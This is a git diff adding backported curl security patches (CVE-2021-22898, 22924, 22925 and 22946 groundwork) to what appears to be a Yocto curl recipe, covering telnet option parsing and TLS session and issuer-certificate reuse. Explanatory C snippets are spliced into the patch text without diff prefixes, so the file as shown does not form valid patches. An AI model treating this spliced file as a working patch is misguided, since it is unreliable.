+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cadca..64f43605a 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -422,12 +422,23 @@ static int ossl_get_ssl_conn_index(void)
+ */
+ static int ossl_get_ssl_sockindex_index(void)
+ {
+- static int ssl_ex_data_sockindex_index = -1;
+- if(ssl_ex_data_sockindex_index < 0) {
+- ssl_ex_data_sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL,
+- NULL);
++ static int sockindex_index = -1;
++ if(sockindex_index < 0) {
++ sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
+ }
+- return ssl_ex_data_sockindex_index;
++ return sockindex_index;
++}
++
++/* Return an extra data index for proxy boolean.
++ * This index can be used with SSL_get_ex_data() and SSL_set_ex_data().
++ */
++static int ossl_get_proxy_index(void)
++{
++ static int proxy_index = -1;
++ if(proxy_index < 0) {
++ proxy_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
++ }
++ return proxy_index;
+ }
+
+ static int passwd_callback(char *buf, int num, int encrypting,
+@@ -1079,7 +1090,8 @@ static int Curl_ossl_init(void)
+ #endif
+
+ /* Initialize the extra data indexes */
+- if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0)
++ if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0 ||
++ ossl_get_proxy_index() < 0)
+ return 0;
+
+ return 1;
+@@ -2341,8 +2353,10 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ curl_socket_t *sockindex_ptr;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
++ bool isproxy;
+
+- if(connectdata_idx < 0 || sockindex_idx < 0)
++ if(connectdata_idx < 0 || sockindex_idx < 0 || proxy_idx < 0)
+ return 0;
+
+ conn = (struct connectdata*) SSL_get_ex_data(ssl, connectdata_idx);
+@@ -2355,13 +2369,18 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ sockindex_ptr = (curl_socket_t*) SSL_get_ex_data(ssl, sockindex_idx);
+ sockindex = (int)(sockindex_ptr - conn->sock);
+
++ isproxy = SSL_get_ex_data(ssl, proxy_idx) ? TRUE : FALSE;
++
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ bool incache;
+ void *old_ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
+- sockindex));
++ if(isproxy)
++ incache = FALSE;
++ else
++ incache = !(Curl_ssl_getsessionid(conn, isproxy,
++ &old_ssl_sessionid, NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -2371,7 +2390,7 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ }
+
+ if(!incache) {
+- if(!Curl_ssl_addsessionid(conn, ssl_sessionid,
++ if(!Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid,
+ 0 /* unknown size */, sockindex)) {
+ /* the session has been put into the session cache */
+ res = 1;
+@@ -2868,16 +2887,25 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
+
+- if(connectdata_idx >= 0 && sockindex_idx >= 0) {
++ if(connectdata_idx >= 0 && sockindex_idx >= 0 && proxy_idx >= 0) {
+ /* Store the data needed for the "new session" callback.
+ * The sockindex is stored as a pointer to an array element. */
+ SSL_set_ex_data(BACKEND->handle, connectdata_idx, conn);
+ SSL_set_ex_data(BACKEND->handle, sockindex_idx, conn->sock + sockindex);
++#ifndef CURL_DISABLE_PROXY
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, SSL_IS_PROXY() ? (void *) 1:
++ NULL);
++#else
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, NULL);
++#endif
++
+ }
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+diff --git a/lib/vtls/schannel.c b/lib/vtls/schannel.c
+index f665ee340..a354ce95d 100644
+--- a/lib/vtls/schannel.c
++++ b/lib/vtls/schannel.c
+@@ -487,7 +487,8 @@ schannel_connect_step1(struct connectdata *conn, int sockindex)
+ /* check for an existing re-usable credential handle */
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ (void **)&old_cred, NULL, sockindex)) {
+ BACKEND->cred = old_cred;
+ DEBUGF(infof(data, "schannel: re-using existing credential handle\n"));
+
+@@ -1193,8 +1194,9 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ struct ssl_connect_data *connssl = &conn->ssl[sockindex];
+ SECURITY_STATUS sspi_status = SEC_E_OK;
+ CERT_CONTEXT *ccert_context = NULL;
++ bool isproxy = SSL_IS_PROXY();
+ #ifdef DEBUGBUILD
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ #endif
+ #ifdef HAS_ALPN
+@@ -1268,7 +1270,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ struct curl_schannel_cred *old_cred = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, (void **)&old_cred, NULL,
+ sockindex));
+ if(incache) {
+ if(old_cred != BACKEND->cred) {
+@@ -1280,7 +1282,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ }
+ }
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, (void *)BACKEND->cred,
++ result = Curl_ssl_addsessionid(conn, isproxy, (void *)BACKEND->cred,
+ sizeof(struct curl_schannel_cred),
+ sockindex);
+ if(result) {
+diff --git a/lib/vtls/sectransp.c b/lib/vtls/sectransp.c
+index 7dd028fb7..9c67d465a 100644
+--- a/lib/vtls/sectransp.c
++++ b/lib/vtls/sectransp.c
+@@ -1376,7 +1376,8 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ bool isproxy = SSL_IS_PROXY();
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+ #ifdef ENABLE_IPV6
+@@ -1584,7 +1585,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+
+ #ifdef USE_NGHTTP2
+ if(data->set.httpversion >= CURL_HTTP_VERSION_2 &&
+- (!SSL_IS_PROXY() || !conn->bits.tunnel_proxy)) {
++ (!isproxy || !conn->bits.tunnel_proxy)) {
+ CFArrayAppendValue(alpnArr, CFSTR(NGHTTP2_PROTO_VERSION_ID));
+ infof(data, "ALPN, offering %s\n", NGHTTP2_PROTO_VERSION_ID);
+ }
+@@ -1916,7 +1917,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ size_t ssl_sessionid_len;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&ssl_sessionid,
++ if(!Curl_ssl_getsessionid(conn, isproxy, (void **)&ssl_sessionid,
+ &ssl_sessionid_len, sockindex)) {
+ /* we got a session id, use it! */
+ err = SSLSetPeerID(BACKEND->ssl_ctx, ssl_sessionid, ssl_sessionid_len);
+@@ -1944,7 +1945,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ return CURLE_SSL_CONNECT_ERROR;
+ }
+
+- result = Curl_ssl_addsessionid(conn, ssl_sessionid, ssl_sessionid_len,
++ result = Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid, ssl_sessionid_len,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index dfefa1bd5..aaf73ef8f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -305,6 +305,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn)
+ * there's one suitable, it is provided. Returns TRUE when no entry matched.
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex)
+@@ -315,7 +316,6 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ long *general_age;
+ bool no_match = TRUE;
+
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+@@ -324,6 +324,11 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ int port = isProxy ? (int)conn->port : conn->remote_port;
+ *ssl_sessionid = NULL;
+
++#ifdef CURL_DISABLE_PROXY
++ if(isProxy)
++ return TRUE;
++#endif
++
+ DEBUGASSERT(SSL_SET_OPTION(primary.sessionid));
+
+ if(!SSL_SET_OPTION(primary.sessionid))
+@@ -411,6 +416,7 @@ void Curl_ssl_delsessionid(struct connectdata *conn, void *ssl_sessionid)
+ * later on.
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex)
+@@ -423,7 +429,6 @@ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
+ char *clone_conn_to_host;
+ int conn_to_port;
+ long *general_age;
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+diff --git a/lib/vtls/vtls.h b/lib/vtls/vtls.h
+index a81b2f22d..a5e348752 100644
+--- a/lib/vtls/vtls.h
++++ b/lib/vtls/vtls.h
+@@ -202,6 +202,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn);
+ * under sessionid mutex).
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isproxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex);
+@@ -211,6 +212,7 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ * object with cache (e.g. incrementing refcount on success)
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex);
+diff --git a/lib/vtls/wolfssl.c b/lib/vtls/wolfssl.c
+index 8c2d3f4a2..dd9f907ff 100644
+--- a/lib/vtls/wolfssl.c
++++ b/lib/vtls/wolfssl.c
+@@ -392,7 +392,8 @@ wolfssl_connect_step1(struct connectdata *conn,
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ char error_buffer[WOLFSSL_MAX_ERROR_SZ];
+@@ -618,9 +619,10 @@ wolfssl_connect_step3(struct connectdata *conn,
+ void *old_ssl_sessionid = NULL;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+@@ -631,7 +633,7 @@ wolfssl_connect_step3(struct connectdata *conn,
+ }
+
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, our_ssl_sessionid,
++ result = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid,
+ 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+--
+2.20.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22898.patch b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
new file mode 100644
index 0000000000..0800e10175
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
@@ -0,0 +1,26 @@
+From 39ce47f219b09c380b81f89fe54ac586c8db6bde Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Fri, 7 May 2021 13:09:57 +0200
+Subject: [PATCH] telnet: check sscanf() for correct number of matches
+
+CVE: CVE-2021-22898
+Upstream-Status: Backport
+Link: https://github.com/curl/curl/commit/39ce47f219b09c380b81f89fe54ac586c8db6bde
+Bug: https://curl.se/docs/CVE-2021-22898.html
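
The bug class is generic: sscanf() leaves an output argument untouched when its conversion never happens, so using the second buffer without confirming that both conversions matched reads uninitialized stack memory. A minimal illustration of the check the one-line fix enforces:

    #include <stdio.h>

    static void parse_env_pair(const char *input)
    {
      char name[128];
      char value[128];

      /* With input like "USER" (no comma) only one conversion matches and
         'value' would be used uninitialized without the == 2 check. */
      if(sscanf(input, "%127[^,],%127s", name, value) == 2)
        printf("name=%s value=%s\n", name, value);
      else
        printf("rejected malformed pair: %s\n", input);
    }

    int main(void)
    {
      parse_env_pair("USER,alice");  /* accepted */
      parse_env_pair("USER");        /* rejected */
      return 0;
    }
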
+---
+ lib/telnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 26e0658ba9cc..fdd137fb0c04 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -922,7 +922,7 @@ static void suboption(struct Curl_easy *data)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
++ if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+ CURL_NEW_ENV_VALUE, varval);
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22924.patch b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
new file mode 100644
index 0000000000..68fde45ddf
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
@@ -0,0 +1,226 @@
+Subject: [PATCH] vtls: fix connection reuse checks for issuer cert and
+ case sensitivity CVE-2021-22924
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2021-22924.html
+CVE: CVE-2021-22924
+Upstream-Status: Backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
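
The case-sensitivity half of the fix is easy to motivate: on a case-sensitive filesystem, two CA paths differing only in case are different files, so matching them case-insensitively (as Curl_safe_strcasecompare did) can wrongly reuse a connection that was verified against a different trust store. A small demonstration with made-up paths:

    #include <stdio.h>
    #include <string.h>
    #include <strings.h>

    int main(void)
    {
      const char *a = "/etc/ssl/CA.pem";   /* hypothetical, distinct files */
      const char *b = "/etc/ssl/ca.pem";   /* on a case-sensitive fs       */

      printf("case-insensitive match: %s\n",
             strcasecmp(a, b) == 0 ? "yes (unsafe for reuse checks)" : "no");
      printf("case-sensitive match:   %s\n",
             strcmp(a, b) == 0 ? "yes" : "no (what the new check reports)");
      return 0;
    }
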
+---
+ lib/url.c | 5 +++--
+ lib/urldata.h | 2 +-
+ lib/vtls/gtls.c | 10 +++++-----
+ lib/vtls/nss.c | 4 ++--
+ lib/vtls/openssl.c | 12 ++++++------
+ lib/vtls/vtls.c | 23 ++++++++++++++++++-----
+ 6 files changed, 35 insertions(+), 21 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 47fc66aed..eebad8d32 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -3555,6 +3555,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.proxy_ssl.primary.CApath = data->set.str[STRING_SSL_CAPATH_PROXY];
+ data->set.ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_ORIG];
+ data->set.proxy_ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_PROXY];
++ data->set.ssl.primary.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
++ data->set.proxy_ssl.primary.issuercert =
++ data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.primary.random_file = data->set.str[STRING_SSL_RANDOM_FILE];
+ data->set.proxy_ssl.primary.random_file =
+ data->set.str[STRING_SSL_RANDOM_FILE];
+@@ -3575,8 +3578,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+
+ data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+ data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
+- data->set.ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
+- data->set.proxy_ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+ data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fbb8b645e..615fbf369 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -224,6 +224,7 @@ struct ssl_primary_config {
+ long version_max; /* max supported version the client wants to use*/
+ char *CApath; /* certificate dir (doesn't work on windows) */
+ char *CAfile; /* certificate to verify peer against */
++ char *issuercert; /* optional issuer certificate filename */
+ char *clientcert;
+ char *random_file; /* path to file containing "random" data */
+ char *egdsocket; /* path to file containing the EGD daemon socket */
+@@ -240,7 +241,6 @@ struct ssl_config_data {
+ struct ssl_primary_config primary;
+ long certverifyresult; /* result from the certificate verification */
+ char *CRLfile; /* CRL to check certificate revocation */
+- char *issuercert;/* optional issuer certificate filename */
+ curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+ void *fsslctxp; /* parameter for call back */
+ char *cert; /* client certificate file name */
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 46e149c7d..8c051024f 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -1059,7 +1059,7 @@ gtls_connect_step3(struct connectdata *conn,
+ if(!chainp) {
+ if(SSL_CONN_CONFIG(verifypeer) ||
+ SSL_CONN_CONFIG(verifyhost) ||
+- SSL_SET_OPTION(issuercert)) {
++ SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+ if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+ && SSL_SET_OPTION(username) != NULL
+@@ -1241,21 +1241,21 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_x509_crt_t format */
+ gnutls_x509_crt_import(x509_cert, chainp, GNUTLS_X509_FMT_DER);
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ gnutls_x509_crt_init(&x509_issuer);
+- issuerp = load_file(SSL_SET_OPTION(issuercert));
++ issuerp = load_file(SSL_CONN_CONFIG(issuercert));
+ gnutls_x509_crt_import(x509_issuer, &issuerp, GNUTLS_X509_FMT_PEM);
+ rc = gnutls_x509_crt_check_issuer(x509_cert, x509_issuer);
+ gnutls_x509_crt_deinit(x509_issuer);
+ unload_file(issuerp);
+ if(rc <= 0) {
+ failf(data, "server certificate issuer check failed (IssuerCert: %s)",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ gnutls_x509_crt_deinit(x509_cert);
+ return CURLE_SSL_ISSUER_ERROR;
+ }
+ infof(data, "\t server certificate issuer check OK (Issuer Cert: %s)\n",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ }
+
+ size = sizeof(certbuf);
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index ef51b0d91..375c78b1b 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -2151,9 +2151,9 @@ static CURLcode nss_do_connect(struct connectdata *conn, int sockindex)
+ if(result)
+ goto error;
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ SECStatus ret = SECFailure;
+- char *nickname = dup_nickname(data, SSL_SET_OPTION(issuercert));
++ char *nickname = dup_nickname(data, SSL_CONN_CONFIG(issuercert));
+ if(nickname) {
+ /* we support only nicknames in case of issuercert for now */
+ ret = check_issuer_cert(BACKEND->handle, nickname);
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 64f43605a..7e81fd3a0 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -3547,7 +3547,7 @@ static CURLcode servercert(struct connectdata *conn,
+ deallocating the certificate. */
+
+ /* e.g. match issuer name with provided issuer certificate */
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ fp = BIO_new(BIO_s_file());
+ if(fp == NULL) {
+ failf(data,
+@@ -3560,10 +3560,10 @@ static CURLcode servercert(struct connectdata *conn,
+ return CURLE_OUT_OF_MEMORY;
+ }
+
+- if(BIO_read_filename(fp, SSL_SET_OPTION(issuercert)) <= 0) {
++ if(BIO_read_filename(fp, SSL_CONN_CONFIG(issuercert)) <= 0) {
+ if(strict)
+ failf(data, "SSL: Unable to open issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(BACKEND->server_cert);
+ BACKEND->server_cert = NULL;
+@@ -3574,7 +3574,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(!issuer) {
+ if(strict)
+ failf(data, "SSL: Unable to read issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3585,7 +3585,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(X509_check_issued(issuer, BACKEND->server_cert) != X509_V_OK) {
+ if(strict)
+ failf(data, "SSL: Certificate issuer check failed (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3594,7 +3594,7 @@ static CURLcode servercert(struct connectdata *conn,
+ }
+
+ infof(data, " SSL certificate issuer check ok (%s)\n",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index aaf73ef8f..8c681da14 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,6 +82,16 @@
+ else \
+ dest->var = NULL;
+
++static bool safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ else if(!a && !b)
++ return TRUE; /* match */
++ return FALSE; /* no match */
++}
++
++
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ struct ssl_primary_config* needle)
+@@ -91,11 +101,12 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- Curl_safe_strcasecompare(data->CApath, needle->CApath) &&
+- Curl_safe_strcasecompare(data->CAfile, needle->CAfile) &&
+- Curl_safe_strcasecompare(data->clientcert, needle->clientcert) &&
+- Curl_safe_strcasecompare(data->random_file, needle->random_file) &&
+- Curl_safe_strcasecompare(data->egdsocket, needle->egdsocket) &&
++ safecmp(data->CApath, needle->CApath) &&
++ safecmp(data->CAfile, needle->CAfile) &&
++ safecmp(data->issuercert, needle->issuercert) &&
++ safecmp(data->clientcert, needle->clientcert) &&
++ safecmp(data->random_file, needle->random_file) &&
++ safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+@@ -117,6 +128,7 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+
+ CLONE_STRING(CApath);
+ CLONE_STRING(CAfile);
++ CLONE_STRING(issuercert);
+ CLONE_STRING(clientcert);
+ CLONE_STRING(random_file);
+ CLONE_STRING(egdsocket);
+@@ -131,6 +143,7 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ {
+ Curl_safefree(sslc->CApath);
+ Curl_safefree(sslc->CAfile);
++ Curl_safefree(sslc->issuercert);
+ Curl_safefree(sslc->clientcert);
+ Curl_safefree(sslc->random_file);
+ Curl_safefree(sslc->egdsocket);
+--
+2.30.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22925.patch b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
new file mode 100644
index 0000000000..13b55f76be
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
@@ -0,0 +1,43 @@
+Subject: [PATCH] telnet: fix option parser to not send uninitialized
+ contents CVE-2021-22925
+
+Reported-by: Red Hat Product Security
+Bug: https://curl.se/docs/CVE-2021-22925.html
+CVE: CVE-2021-22925
+Upstream-Status: Backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/telnet.c | 17 +++++++++++------
+ 1 file changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 4bf4c652c..3347ad6d1 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -967,12 +967,17 @@ static void suboption(struct connectdata *conn)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+- msnprintf((char *)&temp[len], sizeof(temp) - len,
+- "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+- CURL_NEW_ENV_VALUE, varval);
+- len += tmplen;
+- }
++ int rv;
++ char sep[2] = "";
++ varval[0] = 0;
++ rv = sscanf(v->data, "%127[^,]%1[,]%127s", varname, sep, varval);
++ if(rv == 1)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s", CURL_NEW_ENV_VAR, varname);
++ else if(rv >= 2)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
++ CURL_NEW_ENV_VALUE, varval);
+ }
+ }
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+--
+2.30.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
new file mode 100644
index 0000000000..4afd755149
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
@@ -0,0 +1,86 @@
+Backport of:
+
+From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 21 Sep 2020 09:15:51 +0200
+Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy"
+
+When using HTTPS proxy, SSL is used but not in the view of the FTP
+protocol handler itself so separate the connection's use of SSL from the
+FTP control connection's use.
+
+Reported-by: Mingtao Yang
+Fixes #5523
+Closes #6006
+
+Upstream-Status: Backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/ftp.c | 13 ++++++-------
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 3382772..677527f 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn)
+ {
+ CURLcode result = CURLE_OK;
+
+- if(conn->ssl[FIRSTSOCKET].use) {
++ if(conn->bits.ftp_use_control_ssl) {
+ /* PBSZ = PROTECTION BUFFER SIZE.
+
